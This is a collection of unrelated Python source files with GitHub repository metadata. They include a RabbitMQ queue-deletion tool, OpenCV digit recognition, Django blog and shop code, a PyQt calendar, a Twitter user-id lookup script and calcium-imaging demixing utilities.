] | permissive | andrzejandrzej/rabbit-tools | 1ae5c0eb0f4ea37ec34176a4181fb792a005eea2 | f7785144b8bcd23c824cb70790d6f0cdb80143f8 | refs/heads/master | 2021-06-13T16:37:52.253934 | 2020-05-20T12:23:02 | 2020-05-20T12:23:02 | 99,705,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
import logging
from rabbit_tools.base import RabbitToolBase
from rabbit_tools.lib import log_exceptions
logger = logging.getLogger(__name__)
class DelQueueTool(RabbitToolBase):
description = ('Delete an AMQP queue. Do not pass a queue\'s name as an argument, '
'if you want to choose it from the list. You can use choose a single queue '
'from dynamically generated list or enter a range (two numbers separated by'
' `-`) or a sequence of numbers separated by `,`.')
client_method_name = "delete_queue"
queue_not_affected_msg = "Cannot delete queue"
queues_affected_msg = "Successfully deleted queues"
no_queues_affected_msg = "No queues have been deleted."
do_remove_chosen_numbers = True
def main():
with log_exceptions():
del_queue_tool = DelQueueTool()
try:
del_queue_tool.run()
except KeyboardInterrupt:
print "Bye"
if __name__ == '__main__':
main()
| [
"andrzej.debicki@nask.pl"
] | andrzej.debicki@nask.pl |
5ea9fd73389fcab34e9655f5099a8674175c8caa | 4a08eebc535859cf9650f6c5b57007a777bf0ee9 | /post_processing/rawdata_dump_and_formating.py | 3e160d83b64499190dc7f33d04883fd4aac60eac | [] | no_license | Hanq416/Temperature-image_dataloggingsystem | 752d0de6e7a6bc9f6522f8a4a6ec517aa1bc2c96 | 7b670508a550d61f522c9bf8c3f249be98f3dd78 | refs/heads/main | 2023-01-22T09:58:36.129038 | 2020-11-10T17:53:50 | 2020-11-10T17:53:50 | 311,740,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | import os, sys
from time import time
class Reformat(object):
def __init__(self, path_out):
self.po = path_out
def data_sorting(self):
f_name = 'therm_records'
f = open (f_name,'r')
lines = f.readlines()
f.close()
d = self.date_read(lines[0])
s = ''
for line in lines:
if line[0] == 'D':
continue
j = int(0)
beg = int(0)
end = int(0)
for i in range(0,len(line)):
if line[i] == ':':
beg = i + 2
elif line[i] == 'd' and i > beg:
end = i - 2
s = s + line[beg:end]+ ' '
j += 1
beg = 0
end = 0
if j == 4:
s = s + '\n'
break
self.data_write(d, s)
def date_read(self, line0):
c = int(0)
for i in range(0, len(line0)):
if line0[i] == ':':
beg = i+2
if line0[i] == '_':
c += 1
if c == 3:
end = i
date = line0[beg:end]
break
print(date)
return date
def data_write(self, date, s):
outname = 'thermal_sorted_' + date +'.txt'
out = self.po + '/' + outname
f = open (out,'a+')
f.write('%s\n' %s)
f.close()
# MAIN FUNCTION:
#input the work path
work_path = 'H:/Signal_recording_project_dataprocessing/Lawrence_SOUTH_W19toW20' # CHANGE HERE!, attention: '\' need to be changed to '/' !!!!!!
######
#end here#
t1 = time()
inpth = work_path + '/therm_backup'
opth = work_path + '/out'
if not os.path.exists(opth):
os.makedirs(opth)
rf = Reformat(opth)
for root,dirs,files in os.walk(inpth):
for l in dirs:
dir_path = inpth + '/' +l
try:
os.chdir(dir_path)
except Exception as err:
print(err)
try:
rf.data_sorting()
except:
continue
print ('done!')
t2 = time()
ts = t2 - t1
print('time consumption: %02f secs' %ts)
| [
"noreply@github.com"
] | noreply@github.com |
561c9a9ee112d5f6150be9f3711ed50e07da41ca | bfb33e7801e6d2789219a018189e53d96fd2b4a7 | /PF/testing_code.py | 1b160914c9b6b716a6e677a76b41eebadb8f2579 | [] | no_license | MiguelBenavides/Lab_Robotics | 4c8cb48db78915130f4296ea05b3d957573a78f3 | 3662e198091fa1ba47b5ebe9bb14dfcd44c4f497 | refs/heads/master | 2021-03-27T17:15:19.192470 | 2018-05-16T15:08:33 | 2018-05-16T15:08:33 | 123,169,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,265 | py | """
testing_code.py
This code segments blue color objects. Then makes an
AND-bitwise operation between the mask and input images.
With the resulting blue mask image then creates a roi,
inside this region numbers can be detected.
author: Miguel Benavides, Laura Morales
date created: 9 May 2018
universidad de monterrey
"""
# import required libraries
import numpy as np
import matplotlib.pyplot as plt
import cv2
import time
####### training part #############
samples = np.loadtxt('generalsamples.data',np.float32)
responses = np.loadtxt('generalresponses.data',np.float32)
responses = responses.reshape((responses.size,1))
model = cv2.ml.KNearest_create()
model.train(samples,cv2.ml.ROW_SAMPLE,responses)
####### testing part #############
#Frame width & Height
w=640
h=480
def order_points(pts):
# initialzie a list of coordinates that will be ordered
# such that the first entry in the list is the top-left,
# the second entry is the top-right, the third is the
# bottom-right, and the fourth is the bottom-left
rect = np.zeros((4, 2), dtype = "float32")
# the top-left point will have the smallest sum, whereas
# the bottom-right point will have the largest sum
s = pts.sum(axis = 1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
# now, compute the difference between the points, the
# top-right point will have the smallest difference,
# whereas the bottom-left will have the largest difference
diff = np.diff(pts, axis = 1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
# return the ordered coordinates
return rect
def four_point_transform(image, pts):
# obtain a consistent order of the points and unpack them
# individually
rect = order_points(pts)
(tl, tr, br, bl) = rect
maxWidth = w/2
maxHeight = h/2
dst = np.array([
[0, 0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype = "float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
# return the warped image
return warped
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def resize_and_threshold_warped(image):
#Resize the corrected image to proper size & convert it to grayscale
#warped_new = cv2.resize(image,(w/2, h/2))
warped_new_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#Smoothing Out Image
blur = cv2.GaussianBlur(warped_new_gray,(5,5),0)
#Calculate the maximum pixel and minimum pixel value & compute threshold
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(blur)
threshold = (min_val + max_val)/2
#Threshold the image
ret, warped_processed = cv2.threshold(warped_new_gray, threshold, 255, cv2.THRESH_BINARY)
#return the thresholded image
return warped_processed
#Font Type
font = cv2.FONT_HERSHEY_SIMPLEX
# create a VideoCapture object
cap = cv2.VideoCapture(0)
if cap.isOpened() == False:
print('Unable to open the camera')
exit()
# main loop
while(True):
# capture new frame
ret, frame = cap.read()
# convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# ----- Tune these parameters so that blue-colour ------ #
# ----- objects can be detected ------ #
h_val_l = 80
h_val_h = 120
s_val_l = 100
v_val_l = 100
lower_blue = np.array([h_val_l,s_val_l, v_val_l])
upper_blue = np.array([h_val_h, 255, 255])
# ------------------------------------------------------- #
# threshold the hsv image so that only the respective colour pixels are kept
maskblue = cv2.inRange(hsv, lower_blue, upper_blue)
# AND-bitwise operation between the mask and input images
blue_object_img = cv2.bitwise_and(frame, frame, mask=maskblue)
# visualise current frame
cv2.imshow('frame',frame)
# visualise mask image
cv2.imshow('maskblue', maskblue)
# visualise segmented blue object
cv2.imshow('blue object', blue_object_img)
####### Use the mask to create roi #######
blurred = cv2.GaussianBlur(maskblue,(3,3),0)
#Detecting Edges
edges = auto_canny(blurred)
#Contour Detection & checking for squares based on the square area
cntr_frame, contours, hierarchy = cv2.findContours(edges,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
smallerArea = 0
smallerContours = 0
for cnt in contours:
approx = cv2.approxPolyDP(cnt,0.01*cv2.arcLength(cnt,True),True)
if len(approx)==4:
area = cv2.contourArea(approx)
if smallerArea == 0:
smallerArea = area
if area <= smallerArea:
smallerArea = area
smallerContours = [approx]
if smallerArea > 5000 and smallerArea < 15000:
cv2.drawContours(frame,smallerContours,0,(0,0,255),2)
cv2.imshow('Edges', edges)
cv2.imshow('Square detection', frame)
###Create black image to use as mask
img = np.zeros([480,640,1],dtype=np.uint8)
if smallerContours != 0:
roi = np.array(smallerContours)
roi = roi.reshape(-1)
img[roi[3]+5:roi[5]-5, roi[4]+5:roi[6]-5] = 255
cv2.imshow('mask_image',img)
img_num = cv2.bitwise_and(frame, frame, mask=img)
cv2.imshow('cropped_image',img_num)
im = img_num
out = np.zeros(im.shape,np.uint8)
gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
thresh = cv2.adaptiveThreshold(gray,255,1,1,11,2)
_,contours,hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
if cv2.contourArea(cnt)>50:
[x,y,w,h] = cv2.boundingRect(cnt)
cuadrado = h - w
if h > 28 and cuadrado > 10:
cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)
roi = thresh[y:y+h,x:x+w]
roismall = cv2.resize(roi,(10,10))
roismall = roismall.reshape((1,100))
roismall = np.float32(roismall)
retval, results, neigh_resp, dists = model.findNearest(roismall, k = 1)
string = str(int((results[0][0])))
print (string)
cv2.putText(out,string,(x,y+h),0,1,(0,255,0))
cv2.imshow('im',im)
cv2.imshow('out',out)
cv2.waitKey(0)
# wait for the user to press 'q' to close the window
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# release VideoCapture object
cap.release()
# destroy windows to free memory
cv2.destroyAllWindows()
| [
"miguel_benavides95@hotmail.com"
] | miguel_benavides95@hotmail.com |
8fbbd1ed9759f1827fb7a1b942336e2661fddf29 | f9927d34e8eae617892ed553c66d6ed94844c4c5 | /myblog/blog/models.py | 7cf500da289b43672326384b2df6acbac9f419ab | [] | no_license | renxuwei/blog | 2524312122eee1b0024d2ea34bf1850d3ebb00ac | f5bb6074434540df39f24e650c9238035d14b799 | refs/heads/master | 2020-04-17T16:38:20.896305 | 2019-01-21T04:52:17 | 2019-01-21T04:52:17 | 166,749,058 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | from django.db import models
# Create your models here.
class User(models.Model):
username = models.CharField(max_length=10, unique=True)
password = models.CharField(max_length=200)
crate_time = models.DateTimeField(auto_now_add=True)
class Meta:
db_table = 'user'
class Lanmus(models.Model):
name = models.CharField(max_length=150, null=True)
alias = models.CharField(max_length=150, null=True) # 别名
fid = models.CharField(max_length=150, default='无') # 父节点
keywords = models.CharField(max_length=100, default='无') # 关键字
describe = models.TextField(null=True) # 描述
lanmu = models.ForeignKey('self', on_delete=models.CASCADE,null=True)
num = models.IntegerField(default=0)
class Meta:
db_table = 'lanmus'
class Article(models.Model):
title = models.CharField(max_length=200, unique=True)
neirong = models.TextField()
guanjianzi = models.CharField(max_length=200)
miaoshu = models.CharField(max_length=200)
lanmu = models.CharField(max_length=10, null=False)
biaoqian = models.CharField(max_length=500)
icon = models.ImageField(upload_to='upload', null=True)
jiami = models.IntegerField(default=1, null=False)
time = models.DateTimeField(auto_now_add=True)
move = models.CharField(max_length=10, null=False)
lanmus = models.ForeignKey(Lanmus, on_delete=models.CASCADE,null=True)
class Meta:
db_table = 'article'
class Yonghu(models.Model):
name = models.CharField(max_length=10, unique=True, null=False)
password = models.CharField(max_length=200, null=True)
icon = models.ImageField(upload_to='upload', null=True)
class Meta:
db_table = 'yonghu'
# 首页相册
class Share(models.Model):
name = models.CharField(max_length=100, unique=True, null=False)
icon = models.ImageField(upload_to='upload', null=True)
content = models.TextField()
class Meta:
db_table = 'share'
| [
"937265565@qq.com"
] | 937265565@qq.com |
04a03c34ab0d348794edc2375303f110407cde99 | 3882ac93d41f66a40cd19f52559555bc01877b63 | /GetUserIds.py | 0b1b7c82546b696b5cb1ddb9d8dc72b65f2c6834 | [
"Unlicense"
] | permissive | usama124/TwitterDM | 1153ce64a51de3eece6b95490ffd738275ee9402 | f1726f225ff43805b38f49a7dc2a430ada180a4b | refs/heads/main | 2023-06-24T12:29:29.269716 | 2021-07-27T17:33:08 | 2021-07-27T17:33:08 | 389,982,712 | 0 | 0 | Unlicense | 2021-07-27T17:33:08 | 2021-07-27T12:54:07 | Python | UTF-8 | Python | false | false | 1,748 | py | import twitter, time
import configparser
parser = configparser.ConfigParser()
parser.read("Conf/config.ini")
def confParser(section):
if not parser.has_section(section):
print("No section info rmation are available in config file for", section)
return
# Build dict
tmp_dict = {}
for option, value in parser.items(section):
option = str(option)
value = value.encode("utf-8")
tmp_dict[option] = value
return tmp_dict
def read_usernames():
usernames = []
f = open("Data/usernames.txt", "r", encoding="utf-8")
line = f.readline()
while line != "" and line != None:
usernames.append(line.replace("\n", ""))
line = f.readline()
f.close()
return usernames
def write_userids(username_ids):
f = open("Data/userids.txt", "w")
for key in username_ids:
f.write(key + "||" + username_ids[key]+"\n")
f.close()
if __name__ == "__main__":
general_conf = confParser("general_conf")
API_KEY = general_conf["api_key"].decode("utf-8")
API_KEY_SECRETE = general_conf["api_key_secrete"].decode("utf-8")
ACCESS_TOKEN = general_conf["access_token"].decode("utf-8")
ACCESS_TOKEN_SECRETE = general_conf["access_token_secrete"].decode("utf-8")
api = twitter.Api(consumer_key= API_KEY, consumer_secret = API_KEY_SECRETE, access_token_key = ACCESS_TOKEN, access_token_secret = ACCESS_TOKEN_SECRETE)
usernames = read_usernames()
username_ids = {}
for username in usernames:
try:
user_id = api.UsersLookup(screen_name="DanishJanjua_")[0].id_str
username_ids[username] = user_id
except Exception as e:
pass
time.sleep(2)
write_userids(username_ids)
| [
"utahir.itp@sparkcognition.com"
] | utahir.itp@sparkcognition.com |
500134f85ac7800ab444b6bc9db818f0dfcf9b70 | 0c95e9708a7811ef9a4f594154ffc53bbe1aa8ae | /Day1/__init__.py | 375ac6d65041cce7744015aaae12efe14850ac65 | [] | no_license | pearlzhou/smileGo | 4b0c5ba4f8581b13a0810e0198b000b583393867 | afec37ca9c5d52f40a195b2689aba99fcd9e9737 | refs/heads/master | 2020-04-27T16:49:48.094536 | 2019-03-08T08:05:35 | 2019-03-08T08:05:35 | 174,494,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | #!/usr/bin/env python
#-*-coding:utf-8-*-
#author:zhouzz
| [
"1016102237@qq.com"
] | 1016102237@qq.com |
dcf3600aeeaf35be117fdbd9a43fbdc5eabfca39 | 55ddcae82338890a7101b2ff6db0856463702314 | /perfectcushion/shop/views.py | a4f89c9298be6f38dcdf99f21fba7c03c15909e5 | [] | no_license | rixinhaha/DjangoEcommerce | d31d6e8c7a4a40ba3f32d0e27ef203c59475c1dc | 0e3a188e8276bbfb63901747f553dd2ab483c284 | refs/heads/master | 2020-08-03T21:18:14.750498 | 2019-09-30T15:30:09 | 2019-09-30T15:30:09 | 211,887,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.http import HttpResponse
from .models import Category,Product
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from django.contrib.auth.models import Group, User
from .forms import SignUpForm
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login, authenticate, logout
# Create your views here.
def index(request):
text_var = 'This is my first django app web page'
return (HttpResponse(text_var))
def allProdCat(request, c_slug=None):
c_page = None
products_list = None
if c_slug != None:
c_page = get_object_or_404(Category,slug=c_slug)
products_list = Product.objects.filter(category = c_page, available=True)
else:
products_list = Product.objects.all().filter(available=True)
paginator = Paginator(products_list, 6)
try:
page = int(request.GET.get('page', '1'))
except:
page = 1
try:
products = paginator.page(page)
except (EmptyPage, InvalidPage):
products = paginator.page(paginator.num_pages)
return render(request, 'shop/category.html', {'category':c_page,'products':products})
def ProdCatDetail(request, c_slug, product_slug):
try:
product = Product.objects.get(category__slug=c_slug,slug=product_slug)
except Exception as e:
raise e
return render(request, 'shop/product.html', {'product':product})
def signupView(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
signup_user = User.objects.get(username=username)
customer_group = Group.objects.get(name='Customer')
customer_group.user_set.add(signup_user)
else:
form = SignUpForm()
return render(request, 'accounts/signup.html', {'form':form})
def signinView(request):
if request.method == 'POST':
form = AuthenticationForm(data=request.POST)
if form.is_valid():
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('shop:allProdCat')
else:
return redirect('signup')
else:
form = AuthenticationForm()
return render(request, 'accounts/signin.html', {'form':form})
def signoutView(request):
logout(request)
return redirect('signin') | [
"rixinhaha@gmail.com"
] | rixinhaha@gmail.com |
f7e66124cfb611cfdde05053e6b48a4ce7dff2fd | efd30b0ba0fd4d8c9e4ababe8113ba5be08319f2 | /parkings/migrations/0015_fill_normalized_reg_nums.py | 9f8b7a05457ba264cae61e627952374292b9a03d | [
"MIT"
] | permissive | City-of-Helsinki/parkkihubi | 3f559ef047592c5321b69c52474fc23a5eae0603 | 24751065d6e6cd68b89cd2a4358d51bdfc77cae6 | refs/heads/master | 2023-07-20T12:52:43.278380 | 2023-05-10T07:46:38 | 2023-05-10T07:46:38 | 75,084,288 | 14 | 15 | MIT | 2023-07-20T12:52:08 | 2016-11-29T13:32:13 | Python | UTF-8 | Python | false | false | 838 | py | from __future__ import unicode_literals
from django.db import migrations
from django.db.models import Q
from ..models import Parking
def fill_normalized_reg_nums(apps, schema_editor):
parking_model = apps.get_model('parkings', 'Parking')
parkings_to_process = parking_model.objects.filter(
Q(normalized_reg_num=None) | Q(normalized_reg_num=''))
for parking in parkings_to_process:
parking.normalized_reg_num = Parking.normalize_reg_num(
parking.registration_number)
parking.save(update_fields=['normalized_reg_num'])
class Migration(migrations.Migration):
dependencies = [
('parkings', '0014_normalized_reg_num'),
]
operations = [
migrations.RunPython(
code=fill_normalized_reg_nums,
reverse_code=migrations.RunPython.noop),
]
| [
"tuomas.suutari@anders.fi"
] | tuomas.suutari@anders.fi |
feff0ed5afe6dbddcc2ff0f0b0c63b626abb8fe9 | 55bf44425b2c904e915ac8ac365dc293c1346b12 | /Personal Projects/Calendar/cal.py | 26eaa1876c0647a4e56a4b9a7715b18fdc9a0284 | [] | no_license | VincentiSean/Python-Practice | e88e73e6701a895004cf361595697ded9b9f362b | 7b3ba51ae8ecfde5caea7895b6dea425f0cbb94c | refs/heads/master | 2022-03-11T01:41:17.379799 | 2019-10-30T16:44:12 | 2019-10-30T16:44:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,834 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import calendar
import datetime
weekdays = ["M", "Tu", "W", "Th", "F", "Sa", "Su"]
currentMonth = 0
currentYear = 0
class Clndr(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.initUI()
def initUI(self):
global weekdays
global currentMonth
global currentYear
# Set global variables to current date
currentDate = str(datetime.datetime.now()).split("-")
currentYear = currentDate[0]
currentMonth = currentDate[1]
# Display current month on launch
currMonthText = datetime.datetime.now().strftime("%B")
currMonthLabel = QLabel(currMonthText, self)
currMonthLabel.resize(1000, 75)
currMonthLabel.move(0, 10)
currMonthLabel.setAlignment(Qt.AlignCenter)
monthFont = QFont("Times", 36, QFont.Bold)
currMonthLabel.setFont(monthFont)
# Set up left and right arrow buttons
leftArrow = QPushButton("<", self)
leftArrow.resize(50, 50)
leftArrow.move(100, 25)
leftArrow.clicked.connect(self.LeftArrow)
rightArrow = QPushButton(">", self)
rightArrow.resize(50, 50)
rightArrow.move(860, 25)
rightArrow.clicked.connect(self.RightArrow)
# Set up weekday letters
posX = 150
for weekday in range(0, 7):
weekdayLabel = QLabel(weekdays[weekday], self)
weekdayLabel.resize(50, 20)
weekdayLabel.setAlignment(Qt.AlignLeft)
weekdayFont = QFont("Times", 12, QFont.Bold)
weekdayLabel.setFont(weekdayFont)
weekdayLabel.move(posX, 110)
posX += 115
# TODO: set up on a loop to update after arrow clicks?
# Get current month/year for calendar
nowDate = datetime.datetime.now()
nowDate = str(nowDate).split("-")
nowMonth = nowDate[1]
nowYear = nowDate[0]
# Get the current month's days with calendar module
cal = calendar.Calendar()
posX = 100
posY = 135
counter = 1
for day in cal.itermonthdays(int(nowYear), int(nowMonth)):
dayLabel = QLabel(self)
dayLabel.resize(115, 100)
dayLabel.move(2 + posX, posY)
dayLabel.setStyleSheet("border: 1px solid grey;")
dayLabel.setAlignment(Qt.AlignTop)
if day == 0:
dayLabel.setText("")
else:
dayLabel.setText(str(day))
if counter < 7:
posX += 115
elif counter == 7:
counter = 0
posX = 100
posY += 100
counter += 1
self.setGeometry(400, 200, 1000, 700)
self.setWindowTitle("Calendar")
self.setFixedSize(1000, 700)
self.show()
# TODO: Clean up this code into more bite sized chunksrepeated code)
def LeftArrow(self):
global currentMonth
global currentYear
newDay = 1
currDate = datetime.datetime(int(currentYear), int(currentMonth), int(newDay))
currDate = str(currDate).split("-")
currMonth = currDate[1]
currYear = currDate[0]
newMonth = 0
newYear = 0
if (int(currMonth) - 1 < 1):
newYear = int(currYear) - 1
newMonth = 12
else:
newYear = currYear
newMonth = int(currMonth) - 1
newDate = datetime.datetime(int(newYear), int(newMonth), int(newDay))
currentMonth = str(newDate).split("-")[1]
currentYear = str(newDate).split("-")[0]
print(currentMonth)
print(currentYear)
def RightArrow(self):
global currentMonth
global currentYear
newDay = 1
currDate = datetime.datetime(int(currentYear), int(currentMonth), int(newDay))
currDate = str(currDate).split("-")
currMonth = currDate[1]
currYear = currDate[0]
newMonth = 0
newYear = 0
if (int(currMonth) + 1 > 12):
newYear = int(currYear) + 1
newMonth = 1
else:
newYear = currYear
newMonth = int(currMonth) + 1
newDate = datetime.datetime(int(newYear), int(newMonth), int(newDay))
currentMonth = str(newDate).split("-")[1]
currentYear = str(newDate).split("-")[0]
print(currentMonth)
print(currentYear)
def main():
app = QApplication(sys.argv)
main = Clndr()
main.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | noreply@github.com |
4e9f69d87e835061a181778d25e5810c1fdb12f4 | dccf1fea8d62764b8c51259671f9b61d36196d41 | /quiz/tests/test_views.py | 3206b640c985d6489348d1011b7e9a68160df405 | [
"MIT"
] | permissive | Palombredun/django_quiz | e4594852c2709a9c6c58a96cc210f3f3dc1a282b | 1565d251d54dfb54fdee83096b560876833275a2 | refs/heads/master | 2021-07-08T23:11:23.157677 | 2021-01-13T14:26:31 | 2021-01-13T14:26:31 | 224,863,683 | 0 | 0 | null | 2019-11-29T13:53:50 | 2019-11-29T13:53:50 | null | UTF-8 | Python | false | false | 3,013 | py | import datetime
import pytest
from pytest_django.asserts import assertTemplateUsed
from django.contrib.auth.models import User
from quiz.models import Category, SubCategory, Quiz, Statistic, Question, Grade
### FIXTURE ###
@pytest.fixture
def user_A(db):
return User.objects.create_user(
username="A", email="mail@mail.com", password="secret"
)
@pytest.fixture
def category_m(db):
return Category.objects.create(category="m")
@pytest.fixture
def sub_category_n(db, category_m):
return SubCategory.objects.create(category=category_m, sub_category="n")
@pytest.fixture
def quiz_q(db, category_m, sub_category_n, user_A):
date = datetime.datetime.now()
return Quiz.objects.create(
title="title",
description="Long description",
creator=user_A,
category=category_m,
category_name="m",
sub_category=sub_category_n,
created=date,
random_order=False,
difficulty=1,
url="title-1"
)
@pytest.fixture
def stats_s(db, quiz_q):
return Statistic.objects.create(
quiz=quiz_q,
number_participants=1,
mean=2,
easy=1,
medium=1,
difficult=1
)
@pytest.fixture
def grade_g(stats_s):
return Grade.objects.create(
statistics=stats_s,
grade=2,
number=1
)
### Tests page tutorial ###
def test_page_tutorial(client):
response = client.get("/quiz/tutorial/")
assert response.status_code == 200
### Tests page create ###
def test_access_page_create_unlogged(client):
response = client.get("/quiz/create/")
assert response.status_code == 302
def test_access_page_create_logged(client, user_A):
response = client.force_login(user_A)
response = client.get("/quiz/create/")
assert response.status_code == 200
### Test page load_sub_categories ###
def test_page_load_sub_categories(client, db):
response = client.get("quiz/ajax/load-subcategories/")
assert response.status_code == 200
### Test page quiz lists ###
def test_page_quiz_list(client, db):
response = client.get("/quiz/quiz-list/")
assert response.status_code == 200
def test_quiz_list_by_category(client, category_m):
response = client.get("/quiz/category/m/")
assert response.status_code == 200
def test_quiz_list_by_subcategory(client, sub_category_n):
response = client.get("/quiz/subcategory/n/")
assert response.status_code == 200
### Test page take ###
def test_take_quiz(client, quiz_q, user_A):
client.force_login(user_A)
url = "/quiz/take/" + quiz_q.url + "/"
response = client.get(url)
assert response.status_code == 200
### Test page statistics ###
def test_statistics(client, quiz_q, stats_s, user_A, grade_g):
q = Question.objects.create(
quiz=quiz_q,
difficulty=1
)
client.force_login(user_A)
url = "/quiz/statistics/" + quiz_q.url + "/"
response = client.get(url)
assert response.status_code == 200
| [
"baptiste.name"
] | baptiste.name |
3e78cd5beb2f40b2d302957a40cda8debb722657 | 84f8696f6f4c9f785615211fe1a746c3ac5b6996 | /fish_proc/utils/demix.py | aab6d2425221e6340e2ed4d005b33857aa250edf | [] | no_license | zqwei/fish_processing | 48a5494b92a2568bd6393685adfa465a6fe05cdb | 53251f4dc3698285873f7c58e4dd4cfaf030375a | refs/heads/master | 2021-09-21T06:51:35.874171 | 2021-08-16T19:39:34 | 2021-08-16T19:39:34 | 117,905,371 | 2 | 1 | null | 2021-08-16T19:39:34 | 2018-01-17T23:30:06 | Python | UTF-8 | Python | false | false | 9,382 | py | '''
A set of posthoc processing from demix algorithm
------------------------
Ziqiang Wei @ 2018
weiz@janelia.hhmi.org
'''
from ..demix.superpixel_analysis import *
import numpy as np
def pos_sig_correction(mov, axis_):
return mov - (mov).min(axis=axis_, keepdims=True)
def recompute_C_matrix_sparse(sig, A):
from scipy.sparse import csr_matrix
from scipy.sparse.linalg import spsolve
d1, d2, T = sig.shape
sig = csr_matrix(np.reshape(sig, (d1*d2,T), order='F'))
A = csr_matrix(A)
return np.asarray(spsolve(A, sig).todense())
def recompute_C_matrix(sig, A, issparse=False):
if not issparse:
d1, d2, T = sig.shape
return np.linalg.inv(np.array(A.T.dot(A))).dot(A.T.dot(np.reshape(sig, (d1*d2,T), order='F')))
else:
return recompute_C_matrix_sparse(sig, A)
def recompute_nmf(rlt_, mov, comp_thres=0):
b = rlt_['fin_rlt']['b']
fb = rlt_['fin_rlt']['fb']
ff = rlt_['fin_rlt']['ff']
dims = mov.shape
if fb is not None:
b_ = np.matmul(fb, ff.T)+b
else:
b_ = b
mov_pos = pos_sig_correction(mov, -1)
mov_no_background = mov_pos - b_.reshape((dims[0], dims[1], len(b_)//dims[0]//dims[1]), order='F')
A = rlt_['fin_rlt']['a']
A = A[:, (A>0).sum(axis=0)>comp_thres]
C_ = recompute_C_matrix(mov_no_background, A)
mov_res = reconstruct(mov_pos, A, C_.T, b_, fb=fb, ff=ff)
mov_res_ = mov_res.mean(axis=-1, keepdims=True)
b_ = b_.reshape((dims[0], dims[1], len(b_)//dims[0]//dims[1]), order='F')
return C_, b_+mov_res_, mov_res-mov_res_
def compute_res(mov_pos, rlt_):
return reconstruct(mov_pos, rlt_['fin_rlt']['a'], rlt_['fin_rlt']['c'],
rlt_['fin_rlt']['b'], fb=rlt_['fin_rlt']['fb'], ff=rlt_['fin_rlt']['ff'])
def demix_whole_data_snr(Yd, cut_off_point=[0.95,0.9], length_cut=[15,10],
th=[2,1], pass_num=1, residual_cut = [0.6,0.6],
corr_th_fix=0.31, max_allow_neuron_size=0.3,
merge_corr_thr=0.6, merge_overlap_thr=0.6, num_plane=1,
patch_size=[100,100], std_thres=0.5, plot_en=False, TF=False,
fudge_factor=1, text=True, bg=False, max_iter=35,
max_iter_fin=50, update_after=4):
"""
This function is the demixing pipeline for whole data.
For parameters and output, please refer to demix function (demixing pipeline for low rank data).
"""
## if data has negative values then do pixel-wise minimum subtraction ##
Yd_min = Yd.min();
# threshold data using its variability
Y_amp = Yd.std(axis=-1)
if Yd_min < 0:
Yd_min_pw = Yd.min(axis=2, keepdims=True);
Yd -= Yd_min_pw;
dims = Yd.shape[:2];
T = Yd.shape[2];
superpixel_rlt = [];
## cut image into small parts to find pure superpixels ##
patch_height = patch_size[0];
patch_width = patch_size[1];
height_num = int(np.ceil(dims[0]/patch_height)); ########### if need less data to find pure superpixel, change dims[0] here #################
width_num = int(np.ceil(dims[1]/(patch_width*num_plane)));
num_patch = height_num*width_num;
patch_ref_mat = np.array(range(num_patch)).reshape(height_num, width_num, order="F");
ii = 0;
while ii < pass_num:
print("start " + str(ii+1) + " pass!");
if ii > 0:
if bg:
Yd_res = reconstruct(Yd, a, c, b, fb, ff);
else:
Yd_res = reconstruct(Yd, a, c, b);
Yt = threshold_data(Yd_res, th=th[ii]);
else:
if th[ii] >= 0:
Yt = threshold_data(Yd, th=th[ii]);
else:
Yt = Yd.copy();
Yt_ = Yt.copy()
Yt_[Y_amp<std_thres] += np.random.normal(size=Yt.shape)[Y_amp<std_thres]
start = time.time();
if num_plane > 1:
print("3d data!");
connect_mat_1, idx, comps, permute_col = find_superpixel_3d(Yt_,num_plane,cut_off_point[ii],length_cut[ii],eight_neighbours=True);
else:
print("find superpixels!")
connect_mat_1, idx, comps, permute_col = find_superpixel(Yt_,cut_off_point[ii],length_cut[ii],eight_neighbours=True);
print("time: " + str(time.time()-start));
start = time.time();
print("rank 1 svd!")
if ii > 0:
c_ini, a_ini, _, _ = spatial_temporal_ini(Yt, comps, idx, length_cut[ii], bg=False);
else:
c_ini, a_ini, ff, fb = spatial_temporal_ini(Yt, comps, idx, length_cut[ii], bg=bg);
#return ff
print("time: " + str(time.time()-start));
unique_pix = np.asarray(np.sort(np.unique(connect_mat_1)),dtype="int");
